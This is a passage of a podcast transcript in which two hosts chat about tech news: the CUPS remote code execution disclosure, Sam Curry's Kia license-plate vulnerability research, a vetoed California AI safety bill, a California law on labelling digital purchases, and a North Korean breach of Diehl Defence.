when anybody tries to use the printer to print it, it executes the code. FYI. Maybe you'll be interested in that. [00:34:05] Speaker A: Interesting. [00:34:06] Speaker B: So here's the thing. Cups is bundled with almost every Linux system, Unix system available known to man. That's a lot. [00:34:20] Speaker A: That is quite a lot. [00:34:21] Speaker B: That's a lot. To have this level of remote code execution. That's why the world caught fire about this. Now everybody's kind of calming down and cooler heads are prevailing. You know, it's not so bad. I highly recommend you read this article. I'll give you the Cliff notes version here. The researcher, what was his name? I forget his name here. [00:34:44] Speaker A: I'll see if I can find it. [00:34:45] Speaker B: Yeah, if you would. Thank you. It's not a name like, that's american. [00:34:49] Speaker A: Okay. [00:34:50] Speaker B: So it's a little, it's a little different from what I'm used to, so I'm not remembering it. [00:34:54] Speaker A: Sure. [00:34:54] Speaker B: What they were saying is they, they discovered this and then they disclosed it. And apparently the kickback that he got from whatever organization creates cups and handles, that was, you called my baby ugly. My baby ain't ugly. That's how it's supposed to work. Like, it's not a flaw, it's a feature. And it's like, eh. And he was very dis, what's the word I'm looking for here? Disenfranchised with this whole situation. The fact that he's like, no, I feel like I've really found a real flaw here and you're not doing anything about it. And he continued to talk, try to reach out to them, even has all the receipts. And he puts in a lot of their text back and forth or email or whatever it was, however they were messaging back and forth. And I was like, I'm just here to help. I think you guys do a great job. I'm not trying to call your baby ugly, basically, but I do feel like this is an actual flaw that you need to do something about. And apparently he was kind of ignored and even kind of lambasted for. [00:36:02] Speaker A: Wow. [00:36:03] Speaker B: Yeah. And he was like, well, cool, I'm gonna put this on Twitter then. Or whatever he did. [00:36:07] Speaker A: Yeah. That's a good way to get researchers to not help you. [00:36:10] Speaker B: Like, and this has happened in the past. It's not the first time I've heard of this happening. Wherever a researcher has discovered something that they feel like is fairly important and that the organization that is affecting just ignores them or tells them it's, it's not a problem. Don't worry about it. [00:36:26] Speaker A: Does the name Simone Margaritli sound right? Sounds maybe italian. [00:36:30] Speaker B: That's it. [00:36:31] Speaker A: Margaritally. Anyway, I found it on, it was a. Because the write up here that he, that this he or she did doesn't, I don't think, have a name attached to it, but the hacker news referenced it and gave them, gave them credit. So. Simone Margaretli. Applaud. Applaud that person. [00:36:48] Speaker B: Good for you. And so the reason I think you did mention this was part one says part one. [00:36:53] Speaker A: Yes. [00:36:54] Speaker B: At the end of the article it says, I have more, I'm waiting to release it based on how well this goes. Yes. [00:37:03] Speaker A: Interesting. Yeah, he said the first of two, possibly three write ups. Wow, so this might be a trilogy. [00:37:09] Speaker B: Yeah. What was interesting to me is Simone kind of pointed out that there's a lot of legacy stuff that's still in production that has been around since like the seventies and eighties. And they're probably rife with a lot of problems that we just have not discovered yet. And we just got to kind of point, point our microscopes toward these systems and go hmm, let's see what you're doing here. And maybe we can pick up on some more vulnerabilities that are maybe even already being exploited that we just don't know about. I mean cups, who would think cups, right. Cups is on by default by most like you fire up Linux, do a UDP scan 630. One's probably showing up because that's how you print, that's how you get printers to print. It's like, hey, are we printing things? I know Wes likes to print stuff, but. [00:38:02] Speaker A: Well, like you said, if it's rolled into a lot of these, like it's not like you can avoid it really. [00:38:07] Speaker B: Like it's so you can, you just don't turn that service on by default. But if you want to press heck. So here's the thing. Let's say I spin up a web server. Guess what most web servers run Linux, Linux and Apache. [00:38:21] Speaker A: Okay, right. [00:38:21] Speaker B: They're running Apache on Linux. [00:38:23] Speaker A: Okay, right. [00:38:24] Speaker B: That faces the Internet. I got a Linux system facing the Internet. Guess what is now exposed to the Internet? Cups. Yeah, right. And UDP kind of gets forgotten about a lot because big deal, right? We don't run services on UDP. Well yeah, we kind of do. [00:38:47] Speaker A: Huh, interesting. [00:38:49] Speaker B: Yeah. [00:38:49] Speaker A: I will be curious to see if, when I guess he comes out with the next part of this and then if there is a part three to this. So maybe this will be a deja news in the future. It's quite the write up. There's a lot. [00:39:02] Speaker B: Yeah, no, it's very detailed. I read the whole thing. It was very interesting. You know, there's a lot of code snippets in here and everything. Him showing you how he, it was like I said, basically a narrative of the impetus for starting to do the research and then where the research led to interesting thought paths. [00:39:21] Speaker A: Yeah. [00:39:22] Speaker B: And that led him to. Oh, this is an issue, I bet I can. Oh yep, yep, there it goes. And putting two and two together and realizing, oh, how about that? [00:39:33] Speaker A: Yeah. [00:39:34] Speaker B: So like I said, I highly recommend this as a read. If you're not into cyber security, then don't read it. But if you are, this is a great way for you to go, oh, this is how bugs are found. This is how you find really big critical flaws, is you let that curiosity kind of take you down the path and don't assume that what you think is true is true. You verify it. You go, how about that? I never would have thought that these two and that was doing this. Why would you like. That's dumb, right? You're going to be saying, I was like, why would you do. Because that's dumb. But, oh, you just didn't think about it, right? At the time when someone was writing the code, it was like, I just got to get this thing to work and, okay, yeah, that's kind of dumb, but I'll fix it later. [00:40:21] Speaker A: Yeah. [00:40:22] Speaker B: And then it just becomes a part of the thing and it gets lost because there's thousands of lines of code, if nothing, millions of lines of code in some instances. So it's just really interesting to see how they were able to discover this. [00:40:32] Speaker A: Maybe this will pop up again if he does another write up. Who knows? [00:40:34] Speaker B: I would assume that, yes, this is not the last we've heard of this. [00:40:37] Speaker A: Okay. Maybe we'll talk about in a future episode. We'll definitely link that to in our articles, in our description so that you can read more on that write up. If you want some more detail on how this person did this, we're going to go ahead and take a quick break so that we can chug our energy drinks. And I'm probably going to go get a snack. But we will be back with more tech news right after this. [00:40:56] Speaker B: There's a new CCNA in town and. [00:40:58] Speaker A: Here at ACI learning we've got you. [00:41:00] Speaker B: Covered with a brand new CCNA version. [00:41:05] Speaker A: This course covers the theory that you need to succeed as well as the practical hands on application of technologies. [00:41:16] Speaker B: You're going to learn network fundamentals, network. [00:41:20] Speaker A: Access techniques, technologies, IP connectivity, IP services. Don't waste any more time. Get signed up for the new CCNA here at ACI learning. Welcome back. Thanks so much for sticking with us through that break. We have got was rough. It was rough. It was really rough. [00:41:44] Speaker B: It was a good, what, 27 seconds or hour along that roll? [00:41:47] Speaker A: And I lied. I didn't get a snack, so I lied to you. [00:41:50] Speaker B: She's a liar. [00:41:50] Speaker A: But I promise I won't lie to you in the next half of this show. [00:41:53] Speaker B: How are we supposed to believe you now? [00:41:56] Speaker A: Well, I guess you just have to make that choice for yourself. [00:41:58] Speaker B: The trust has been broken. [00:41:59] Speaker A: Weigh the risk versus the rewards, and you can decide. And I would love to hear what you think of what you decide. [00:42:04] Speaker B: I gotta deal with people. [00:42:05] Speaker A: Leave a comment. And if you're enjoying this episode so far, leave a, like, subscribe so you never miss an episode in the future. We are going to be in Deadwood next week for our episode, so that's gonna be a fun one. This is the last time we'll be in this studio for a couple of weeks. So looking forward to that. But getting into the rest of these articles, this is a favorite. A favorite segment of ours. Pork chop sandwiches. Pork chop sandwiches. Oh. [00:42:28] Speaker B: Pork chop sandwiches. [00:42:29] Speaker A: Oh. So if you don't know the purpose. [00:42:35] Speaker B: Yeah, you can now, right? Because he puts it in post, right? [00:42:38] Speaker A: Yeah. Yeah, I think so. Yeah. [00:42:39] Speaker B: That's so funny. [00:42:40] Speaker A: So if you don't know the purpose for this segment, it's basically just like, what the hell is going on? [00:42:45] Speaker B: Yeah. [00:42:45] Speaker A: What? So this article, I think, fits quite nicely into that category. [00:42:49] Speaker B: I'm gonna go with. Yes. [00:42:50] Speaker A: Hacking Kia remotely controlling cars with just a license plate. And, I mean, if you've got a car, it has a license plate. Right? So we'll take a look at this here. [00:43:00] Speaker B: Daniel pulled this like my cousin's car sitting on blocks. [00:43:04] Speaker A: Yeah, you should have a license plate. If you don't. [00:43:06] Speaker B: A big oil stain underneath it on the. [00:43:08] Speaker A: Yeah, you should probably. It's like Christine is just sitting up there deteriorating until somebody gets a hold of this flaw or of this vulnerability and brings it back to life. So this is something that they demonstrated. This. And, Daniel, you probably read through this in more detail. [00:43:22] Speaker B: Yes, I did. I read this entire article, and I watched all the videos. And then I was like, wow, what the. Huh? Why? And then. Oh, man. And that's kind of the gamut of emotions that I went through in a two second sound bite. And so here's what's up. Security researchers doing what security researchers do? This organization or this person? Sam Curry. Right. This is their. Their blog. Anyway, it says on June 11, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware equipped vehicle in about 30 seconds. [00:44:08] Speaker A: Wow. [00:44:09] Speaker B: And here was the fun part. You ready? Regardless of whether it had an active Kia connect subscription or not. [00:44:18] Speaker A: So if you're a Kia owner, you. [00:44:19] Speaker B: Just had to have a Kia with a license plate. [00:44:22] Speaker A: That's crazy. [00:44:23] Speaker B: For this to work, obviously it had to, you know, have some built in electronical features as well. It's not like I went and grabbed a 2003 Kia and I'm able to pull this off. It has to be a modern Kia. [00:44:36] Speaker A: But most cars produced in like the last ten years have electronic components to some degree. [00:44:39] Speaker B: Yes. And that's what really made me kind of like piss down my leg when I saw this. I was like, that is so a. I'm buying a 1988 Ford Mustang with no electronics. This is the devil, right? This is the devil. They put the devil in your car. The devil is now running your car. How do you feel about Satan behind the wheel, right? The big red scaly one himself in control of your vehicle. I don't feel good about it. I do not feel good about it at all. I'm putting my tinfoil hat on. I can see governments misusing this. It's going crazy. It's going crazy. Yeah. Thank you. Thank you, Christian. Just let it seek, seep in, down inside your inside body. [00:45:26] Speaker A: You're going church lady direction for a second. I really am Satan behind the wheel. But you're really. That was pretty good. But I could see what you mean because it doesn't really, you know, usually it's like, well, if you don't like it, then just don't use this service. Or don't. But if you've bought a Kia, even if you don't use this Kia, connect, whatever, you're kind of screwed. Like, I mean, this has been patched. But like, in the event that things like this happen, this could happen in theory to any, any car manufacturer, right? If you have a Kia, so it's not even an issue of like, well, then just don't use that service. What are you supposed to do? Go sell your car, I guess. [00:45:58] Speaker B: Yes. You don't buy a Kia. [00:45:59] Speaker A: Yeah. [00:46:00] Speaker B: And of course this is just because they are, for whatever reason, focused on Kia. Maybe one of them had a Kia. Like, let's hack my Kia. [00:46:06] Speaker A: Yeah. [00:46:07] Speaker B: It was a group of researchers that kind of got together and did all this stuff. It goes to the fact, and here was the other fun fact. This right here's what they could do. They built a custom tool, which they did nothing make available to the general public. They did the proper thing, responsibly, disclosed this to Kia. Kia, patched the issue. But what's the next one, right? Why does my car need the ability to have control over. Am I that lazy? I'm sorry, gotta call a spade a spade here. Am I that lazy that I need remote start? That I need to be able to contact Kia? Is it nice? Yes. Yes, it is. But I feel like we've comforted ourselves into a corner that if we keep going, we won't be able to get out of. Because not only were they able to unlock the car and start the cardinal, they get gps location where the car is. They get who owns the car, information about the owner that owns the car. Like, there was tons of information that was disclosed to this. And that makes me, like, terrified. [00:47:28] Speaker A: Oh, yeah. [00:47:28] Speaker B: I don't need people knowing where my car is. What. What do you need to know that for? [00:47:33] Speaker A: Yeah. [00:47:34] Speaker B: If someone steals my car, so what? It's stolen. Oh, well, right. It's just a thing. My. That's why I pay insurance, right? And the insurance comes along, gives me a big, fat check, and I go get another car. [00:47:47] Speaker A: I. The thing that came to my mind, especially with that geolocation stuff, is I'd be scared for myself for, like, trafficking concerns. That would be what would freak me out, because I was looking at the. It is quite the list of vehicles that are affected. [00:47:58] Speaker B: Oh, yeah. [00:47:58] Speaker A: It's with all these. The new 2025 models. But, like, Christian, if you show the graphic, it's like, you know, you keep scrolling. You keep scrolling. It's 2025. 2025. But all the way down. I mean, keeps. And this is read only, but it just keeps going and going and going. [00:48:13] Speaker B: Maybe it all the way. [00:48:15] Speaker A: All the way to 2014. [00:48:17] Speaker B: Years ago. [00:48:17] Speaker A: Ten years. And. And when you go the further back, it's like, okay, well, no, it can't remote unlock. No, it can't. But geolocation is one of the things that you could do in all these vehicles. So for me, that I'm scared to, like, I go to target and come back out to my car, and I'm, like, checking under the car, and maybe I'm a little paranoid, but this kind. [00:48:32] Speaker B: Of how you have to be slips an airtag. [00:48:34] Speaker A: But. Right. This is the kind of thing where even if I, like, fully. Also what you have to do is look at my license plate if I drove a Kia. Right. [00:48:39] Speaker B: Yeah. [00:48:39] Speaker A: And if there was a vulnerability like this that was active and then just, okay, yeah, we can geo locate her vehicle now. That kind of thing would terrify me. So I guess I'm glad I don't drive a Kia. [00:48:47] Speaker B: Yeah. [00:48:48] Speaker A: And this has been patched. But it just. The possibility now is, in our minds. [00:48:51] Speaker B: I'm gonna get. I'm gonna get, like, a 1984 BMR. No. Mercedes diesel. Right. Then I'm gonna put frag oil in it and do biodiesel. And no tracking. I don't, hey, I. I do not like being tracked. I don't know. Yes, I have a phone. I get it. And I'm currently in the market for one that does not track. [00:49:10] Speaker A: What are the, like, no phones or whatever it's called. [00:49:12] Speaker B: So there's one called upphone. And there's. Then you can go like the Linux route, like pine phone. And then there's graphene, if you can install on graphene. But I'm really starting to get on the bandwagon here of what do you need that for? What do you need the ability to hear and watch and do everything? It's because they want that information so they can target advertisements to you. I don't need to be advertised to. Right. This is. I don't care if I need a product. I'll go to the store and I'll look and go, cool. Clean's grimy mildew better than the competitor next to it. Try that. I don't need to have like, these ultimately crazy targeted ads. And then, of course, the abuse that could come from those systems. Is there a convenience to it? Absolutely. Is there good uses for. Absolutely. I'm not saying that there's not. I just don't think that for me it's worth it. [00:50:09] Speaker A: Yeah. The risks that come with it do not outweigh whatever convenience you get from it. I think as far as, like ads, like targeted ads and stuff go, for me, it almost has the opposite intended effect. If I get a targeted ad, like you were talking about, like, cleaning products, if I get a targeted ad for like, Ajax or whatever, the cleaner, I am going to be so irritated, especially if that keeps showing up that I'm less likely to buy it. I'm just to. Or if I get like a YouTube ad and it's constantly like, grubhub, Grubhub, Grubhub. I'm not using Grubhub ever again because I'm so sick of it everywhere. Whereas the purpose is they think I'd be interested in Grubhub. So I'm gonna keep getting that targeted ad. Now I hate you now. I hope you go out of business. [00:50:42] Speaker B: That's exactly it. [00:50:43] Speaker A: You won't leave me alone. So it's like the purpose of these targeted ads is to get us to buy your stuff. Maybe I'm alone in this, but for me, you are ensuring that I never buy from you again. [00:50:51] Speaker B: And I'm one consumer proud parenting moment. Kids were watching tv the other day, right? And I was in the kitchen, and you can, obviously the kitchen and the living room are very closely connected and the kids are watching. And one of my girls had the remote and the other one was kind of paying attention while the one with the remote was not. And commercials came on and all I hear is mute because I've taught them so well to not pay attention to ads. [00:51:23] Speaker A: I will not be advertising. [00:51:24] Speaker B: It was just like their default of just like, oh, ads on mute. I mute the ad, don't pay attention to it. [00:51:31] Speaker A: Smart. Smart. [00:51:32] Speaker B: Right. We teach them when they're young and when they're old, they won't depart from it. [00:51:36] Speaker A: Either mute or I just get up and leave and go to the bathroom. [00:51:38] Speaker B: Yeah. [00:51:38] Speaker A: Like, I will come back when you put my chill back on. This makes me sound like one of the, like the people from Wall e that, like, they just have the screen in front of their face all the time. That's what I sound like. But you're right, like, I don't want to be advertised too, out of spite. Even if this is a product I would enjoy. [00:51:50] Speaker B: Mute, skip, cancel, find advertisements. I don't like targeted advertisements. Right. And for the love of God and all that is holy, get rid of pharmaceutical ads. If there's a change.org petitioner, something I can sign, I would highly consider removing a pinky finger if it meant that there would be no more drug advertisements on tv. I'd be like, you know what? I might be willing to take that hit. Yeah, I might. I might be willing. [00:52:21] Speaker A: I would have to agree to agree with you on that. Yeah, yeah, absolutely. [00:52:24] Speaker B: Because if the fact that I know the Jardian's jingle. [00:52:30] Speaker A: Or o o Zempig. [00:52:32] Speaker B: Yeah, listen, I don't need to know about my a one c's. I get it. The people that are, that do. But here's the thing. If I've got diabetes or whatever, like, my doctor is going to be the one to tell me here, what you need is Jardians. [00:52:48] Speaker A: Yeah, exactly. [00:52:49] Speaker B: Or whatever variant there is. I don't make that decision. The doctor makes that decision. Because they're a doctor. I am not a doctor. [00:52:57] Speaker A: Well, then you get into territory of, like, if there's kickbacks from certain products. So it's like, I think, I think removing advertising from cynical products is a good place to start. [00:53:05] Speaker B: I bet there's some weird thing that we don't know about that. If I say to my doctor, Jardians, he by law has to go, well, they request a jardiance. [00:53:15] Speaker A: Yeah. [00:53:15] Speaker B: And it's in this space, so therefore, I must give them jardiance. Even if they didn't necessarily ask for it. They mentioned it, and therefore, it could be construed. Right. I don't know that that's totally, you know, off the dome. [00:53:28] Speaker A: We truly do live in a society speculating. We live in a society flippin anyway. [00:53:33] Speaker B: Pork chop sandwiches, everyone. [00:53:34] Speaker A: Pork chop sandwiches. Tinfoil hat. [00:53:36] Speaker B: Yeah. I made two out of one. [00:53:37] Speaker A: It's just. It's a great way. Well, and, I mean, we're not done. We're not even done. I mean, this is. I mentioned earlier, we got news all around the world. So jumping over to the west coast in California, we talked a little bit in recent weeks about some AI laws that might be coming into being. Turns out, not yet. The California governor vetoed an AI safety law that was apparently controversial. Basically said, hey, start over. So, lots of strong opinions on this. And initially, my thought was when, because the reasoning that this guy gave was, hey, look, I totally want regulation in place. Da da da da. But I think the way that we went about this, it was written too hastily. We got to make sure we reconsider and consider every possible thing. Go back to the drawing board, rewrite this. Da da da. But then again, I thought about it, and I'm like, this guy has claimed in the past, Gavin Newsom is the governor, right? I don't really have any opinions on politics in California, to be honest with you. I don't live there. So he's previously claimed 32 of the world's 50 leading AI companies are said to be located in California. So I have to wonder if there is a little bit of I don't want to over regulate because what if these companies start to leave because they don't like all these regulations in California? Maybe this is a tinfoil hat thing. I don't know. But I have to wonder if there is a financial motivation for the state of California to. Well, hang on. Let's just wait and be careful. And it's not so much we need to rewrite this law to make sure that we are protecting consumers. It's more, well, we're over regulating. We got to make sure that these AI companies can still do what they need to do. [00:55:04] Speaker B: So, if I'm not mistaken, the reason that this came about, why Gavin Newsom has proposed these regulations, was due to the fact that Elon Musk put out a video, an AI video of Kamala Harris. Kind of like, I know we're kind of dipping into politics here. And that's not what we mean to, but just objectively saying, from what I understand, this is the timeline of events that occurred, that there was. Elon had put out this video. I think he used his grok AI to create this video of her saying all the, you know, negative things about herself or whatever, like she was agreeing with negative things about her, right? And he said, this is. And he being Gavin Newsom said, well, this is. This is dangerous. This is misinformation. This is disinformation. [00:55:50] Speaker A: We gotta regulate. [00:55:51] Speaker B: And then Elon hit back with, it's called satire. It's called parody. That's. That's what goes on here. And then he was like, well, I'm gonna make it against the law. And now he's trying to make it against the law. [00:56:04] Speaker A: And that's interesting, because his. His criticism supposedly centered around the fact that he's saying this bill only regulates the largest AI models out there, and smaller AI models are exempt from enforcement. And that's a policy gap. But I would think a video like that is more likely to come from some dude just producing it and putting it, hey, this is funny, you know? So I would think this law wouldn't have even taken care of that. So what the point? [00:56:24] Speaker B: I don't know. I didn't look at the law, so. [00:56:26] Speaker A: And I'm. I'm never one to push for, like. [00:56:28] Speaker B: More regulation, much like the senators and congresspeople that we have. I didn't look at it. [00:56:33] Speaker A: You should run. For all I'm sure is hell going. [00:56:35] Speaker B: To vote on it, though. [00:56:37] Speaker A: When it was for Congress, it went through, and it was approved prior to ending up on Gavin Newsom's desk, and he just said, no, we got to start from scratch. So I would be curious again. I know we're edging into dangerous territory here. So without getting too political with it, I'd be curious to know, strictly from an AI regulation standpoint, what y'all's opinions are on that, because I think there is just like, with regulating giant corporations to ensure that smaller businesses don't get, like, swallowed. Yeah, I can see the benefit to regulating certain things, but at the same time, I would never want to push for over regulation. [00:57:12] Speaker B: It's always. It's always like a balancing act. [00:57:13] Speaker A: It is such a delicacy. [00:57:14] Speaker B: Regulation and freedom of, like, what a company can and cannot do. [00:57:18] Speaker A: Right, because it's innovation. Right. But it's, at the same time, you. [00:57:22] Speaker B: Can see well, because you got both of the extremes where if. If organ, if corporations have total freedom they have no oversight. [00:57:31] Speaker A: Yeah. [00:57:32] Speaker B: You know, they kind of go into this whole corporatization. Corporatization and, and like the worst parts of capitalism. [00:57:38] Speaker A: Right, right. Absolutely. [00:57:40] Speaker B: You know, that extreme, the extreme part of that. And then the government, they also have their problems with going into extremities as well, where it's like, well, we're totally going to lock you down and you can't do anything without our say. And we're a giant behemoth of red tape and bureaucracy. Therefore nothing ever gets done or can be gotten done. And, you know, so we always try to hopefully are trying to find that middle ground where it's sweet, where companies have the freedom to innovate and do things that they could without with guardrails in place enough to keep them out of the weeds of extreme. And the government doesn't get to overreach and kind of lock you down and control your life but has some say so over what? Again, it's a difficult thing to find that sweet spot. And here we are really dancing around political things, which we don't want to do. But when it comes to AI, AI is growing rapidly and if it continues on its pace, we don't know where it's growing so fast, we can't predict. And it's so how it's gonna be used. [00:58:44] Speaker A: It's so unprecedented. Like, we've not seen anything like this before. It's hard to know. [00:58:47] Speaker B: It's like a cabrian explosion. [00:58:49] Speaker A: It's hard to know what the right way to handle it is and how to go about it. So I can see there being a lot of stuff like this, vetoes being, or vetoes bills or laws being introduced and then vetoed, or, hey, we gotta go back to the drawing board. So who knows about the stated reasons versus real reasons and things like that. But for better or for worse, this law has been vetoed and there's, there may be more coming up in the future. [00:59:07] Speaker B: My personal position is like, let's just make some stuff. Like, let's, let's just slow down. [00:59:11] Speaker A: Yeah. [00:59:12] Speaker B: Right. [00:59:12] Speaker A: I would agree. [00:59:13] Speaker B: I'm not saying don't continue to invest and innovate with AI, but let's slow. Let's pump the brakes a bit. [00:59:19] Speaker A: Yeah. [00:59:19] Speaker B: Like, let's get used to what we do know about it before we start letting it continue to grow and just, just take our time. But we're such a society now of instant gratification that I feel like Doctor Ian Malcolm on Jurassic park. We were so, you know, concerned with whether or not we could we forgot about whether or not we should. [00:59:42] Speaker A: Yeah. [00:59:43] Speaker B: And so true. That seems to be a problem. [00:59:45] Speaker A: I would agree. I would agree. [00:59:46] Speaker B: Dinosaurs are killing everybody. The AI, dinosaurs are out there chewing up lawyers and chasing kids across a park. [00:59:54] Speaker A: I know. I saw it. [00:59:55] Speaker B: I did. [00:59:56] Speaker A: Crazy misinformation right here. So on the other side, though, of California legislation going into a little bit of a, I guess, less political territory, there is a new law that will force storefronts to disclose that buyers don't actually own their digital purchased media. So this isn't a bill that Gavin Newsom did sign into law over in California. And a lot of this is California. We don't live in California, but a lot of this tech stuff seems to make its birth over there. So, you know, this may make its way over in our direction eventually. So basically, you know, if you don't know, I didn't know this until the past year or so. I didn't really think about it. But digital media, like video games and movies and tv shows, when you buy them through like Amazon prime or whatever, you don't actually own them. So it can be FYI. Yeah, FYI, if you didn't know, if. [01:00:39] Speaker B: You were under the impression that you owned that stuff. Yeah, we'll go ahead and fix you up here. [01:00:44] Speaker A: So this bill isn't going to necessarily, or it's not going to change that. It's not going to say, yes, you do own that media. You don't. But it is at least going to in theory, force storefronts. And things to be more obvious about the fact that you don't own these and the way that it's going to do that is by prohibiting storefronts from using words like buy or purchase any word that a reasonable person or people such as ourselves would understand to mean I own this. If they say, hey, buy this product, I would assume that I own that product because I paid for it and I purchased it. So they are going to have to use words that have to do with licensing. You are licensing this and it's very obvious, it's made very obvious this license could expire at any time. So it's at least, I think, a step in the right direction for transparency because if you don't already know that that's the case and that you don't own this digital media. Yeah, it'd be a little bit, well, I bought this game, I paid like $60 for it and digital downloaded it and now it's just gone from my library. Right. Well, if that's not the case, if it's if buy or purchase is not the word used, maybe it's at least a little more obvious and, you know, maybe you still pay for it, but, you know, at least going into it, it's a little more obvious, you know, that you don't own it, man. [01:01:49] Speaker B: You know, I feel like maybe we're at the. So because I'm into retro gaming a lot, there's a lot of people out there that develop games for retro systems, like modern, current games that they're like, hey, I like, I like the eight bit Nintendo. I think it was awesome. I want to make my own eight bit game and that will play on a Nintendo emulator and Nintendo could go pound sand because they don't own this, they don't have the rights. So. And there's a lot of pretty cool games out there that are being developed now for all these Nintendo snes, Genesis, you name it, all these Game boys, Game Boy advance, dream, you name it, people are making games for these things. It seems like we are now at a really good spot where cool Sony doesn't want us to own, Nintendo doesn't want us to own, Microsoft doesn't want us to own. Let's just become independent game developers and kind of decentralize those games. The developer makes directly the money from their labors because I purchased it from you, you made it, here's your money. I get the game. Everybody's happy, right? They don't have to go through, like, I get the appeal of going through a big company because they have, you know, infinite amount of money, basically infinite money to help you develop an awesome game. But is, again, it's all about is it worth it? Right. We've said that a couple of times this episode already. Is it worth it? And we've kind of pushed it so far that now, because you have no ownership, it doesn't, to me, it wouldn't be worth it anymore. I don't care. And I abandoned consoles in like 2012 or 14 because of it. Yeah, I was like, I'm sick of not owning my stuff. Yeah, they got cool games, but I live this long without them. I think I can go longer without it. You know, I just act like they don't exist. [01:03:43] Speaker A: And I think you're right. It's the balance of whether it's worth it or not. [01:03:46] Speaker B: Right. [01:03:46] Speaker A: And as far as physical media goes, there's a lot of convenience. A lot of it comes down to convenience. Yeah, as far as, okay, if I want to take my switch on to Deadwood with us. Right. And I probably will so I can play it on the plane or whatever. I don't have to worry about bringing ten game cartridges so I can play ten number games if I just download them digitally. Well, I got ten games in my library that I can play at any time. Right. But the downside of that is that I don't have a physical copy that I own that I can then play. For all I know, maybe it's not likely, but for all I know, Nintendo could say, sorry. Nope, nope, nope, nope. We're yanking this stuff. And you don't. You don't have it in your library anymore. So, yes, it's convenient to be able to have access to it. But is it worth it? Right? Maybe. [01:04:22] Speaker B: Well, and that. That goes to the idea that you have it all stored in the cloud. And even if it is, like, what you're doing is you're relying on Nintendo's cloud platform to access your games. Guess what? I don't. I can access my games in a cloud platform. That doesn't have to be Nintendo. [01:04:40] Speaker A: Yeah, right. [01:04:41] Speaker B: There is a digital file out there. That is the game. As long as I have a copy of that I put on it, and my retro handle has Wi Fi built into it, I. Can I spot my phone? And now if I have it up in Dropbox or wherever, stream it down, and then there's, like, moonlight for streaming your games to your handhelds. [01:05:00] Speaker A: Oh, that's neat. [01:05:01] Speaker B: Yeah. So if you have the game on your Xbox or whatever, and steam, you use moonlight. Go. It's actually playing on my PC, on my thing, but it's. It's streaming the content to my handheld. So we live in a technological time. I could download the game onto my handheld. It has internal storage, and now the game resides on my. On my actual system. So go ahead and cut off my cloud access to Nintendo. [01:05:26] Speaker A: I dare you. Yeah. [01:05:28] Speaker B: Threaten me with a good time. [01:05:30] Speaker A: To be clear, I'm not saying that I don't digitally download, like, I do have digitally downloaded games. I'm not saying, like, I have all physical media. I. A lot of my games are digital because it's just the old switch. I had the port. I got it. My brother gave it to me because the port for the games didn't work. So I had to get my stuff digital. But. So I'm not saying I don't use it. I'm just saying when you weigh the pros and cons, you know what it. [01:05:50] Speaker B: Is, is if you think about it, companies like Nintendo, Sony, or any. Any company that gets you kind of hooked into their ecosphere. How do they do that? Right? They make it easy. They make it so easy. And they give you such, the best of everything. But you don't realize you're making this, like, this deal with the devil, right. That I always think of it as like, did you ever see the movie be dazzled? [01:06:17] Speaker A: No, what? [01:06:18] Speaker B: Super funny. There's, there's, there's a re, there's a. The original version of Bedazzled, and there's the Brendan Fraser remake that was done in the, I think the nineties or early two thousands, 2000. Very funny. And it's, it goes to the idea of if you make a deal with the devil, it basically, this guy gets to make a deal with the devil for ten wishes or however many wishes it was. But everything he wishes for the devil twists it and makes it horrible. Right. So if he wishes for world peace, it's because everybody's dead, you know, and therefore no one's around a war or that kind of thing. Right. And that's how I feel signing these licensed contracts with people. When you buy into their ecosystem, that's what's happening. You feel like you're getting this cool thing of, I've got this, these great games. I've got access to all the great comfort, creature comforts that they build for the system, but underneath the surface there's like all this stuff going on that I'm just not aware of. And it's not good for me. It doesn't benefit me in any good way. Right. Yeah, it's just a way for them. And you can say, well, you're making a contract real good. I agree with that. You're absolutely making a contractual agreement with these companies. I just don't think that, like most times, most of the times when you, when you bang on a contract between two parties, there's mutual benefit. That's why we're entering into a contract with each other there. And it should be pretty equal in benefits. You should benefit in such a way. And I get to agree. And yes, I read your eulas, but that's a lot. You know what I mean? It's unreasonable to say that the average person is going to hire a lawyer to be able to look through all the lawyer speak that's in an eula to discern what's actually going on under the hood. That's not fair. So therefore decentralize. Spend a little bit more time inconveniencing yourself in little ways for your own benefit. Right. It's the long game. It's the long run. Look, big picture. Don't look what's expedient right now. Look at how it affects you down the road. [01:08:27] Speaker A: Yeah, I got a little entranced in reading this Wikipedia page for the film Bedazzled Wild. [01:08:34] Speaker B: It's very funny, very odd. Yeah. [01:08:37] Speaker A: But now I kind of want to watch it. [01:08:38] Speaker B: Oh, yeah. Super worth a watch. [01:08:39] Speaker A: Maybe I'll go download some digital media. [01:08:40] Speaker B: Off Amazon prime and watch Elizabeth Hurley was the devil. That's the one I. Oh, okay. [01:08:46] Speaker A: Okay. The original, the 1967 one. It was like a dude named George spigot or something was the character name. I don't know. Maybe I'll go watch it then. So. But I know we're coming up on our time here. This episode may go a little long, but I think that's okay because there was a lot of. [01:08:58] Speaker B: We do what we want. [01:08:59] Speaker A: Yeah. A lot of good news this week. Jump in. Jumping across oceans or. Yeah, across oceans. To Europe, North Korea. Hackers linked to breach of german missile manufacturer. So Europe and Asia, I guess we have talked previously about concerns with north korean foreign nationals being able to infiltrate companies through deepfakes and things like that. So what exactly happened here? [01:09:22] Speaker B: So, Kim Suki. Old Kim Suki, the old north korean apt we see out there doing your darned working hard. That's right. They're working hard. So they did a lot of work to infiltrate a german weapons manufacturer that makes missiles and ammunition. And it seems like this is kind of like a revenge hack because recently this company, which is called deal defense. I think it's deal Diehl. Right? [01:09:54] Speaker A: Dealer. Yeah, that looks right. [01:09:55] Speaker B: Deal defense. They recently penned a contract with South Korea to send them. They purchased missiles from them. [01:10:03] Speaker A: Oh, okay. [01:10:04] Speaker B: FYI, north and South Korea, not like siblings. They're not the simpaticoalking term at the moment. Yeah. [01:10:12] Speaker A: Okay. [01:10:13] Speaker B: So it seems reasonable that this might be them kind of doing some retribution acts. [01:10:18] Speaker A: Okay. [01:10:18] Speaker B: Against their. [01:10:19] Speaker A: Interesting. [01:10:20] Speaker B: Their people, but very, very interesting. They made some in some PDF's that had some naughty basic malware stuff. [01:10:33] Speaker A: Hmm. [01:10:34] Speaker B: Doing that. And they. So it says right here, making air to air missiles. Oh, here we go. Defense according to deal Der Spiegel report. That's always fun to say. I want to say Der Spiegel more often. [01:10:48] Speaker A: Yeah. [01:10:49] Speaker B: Researchers at Mandia investigated the compromise and found the attackers performed detailed reconnaissance on deal defense ahead of the 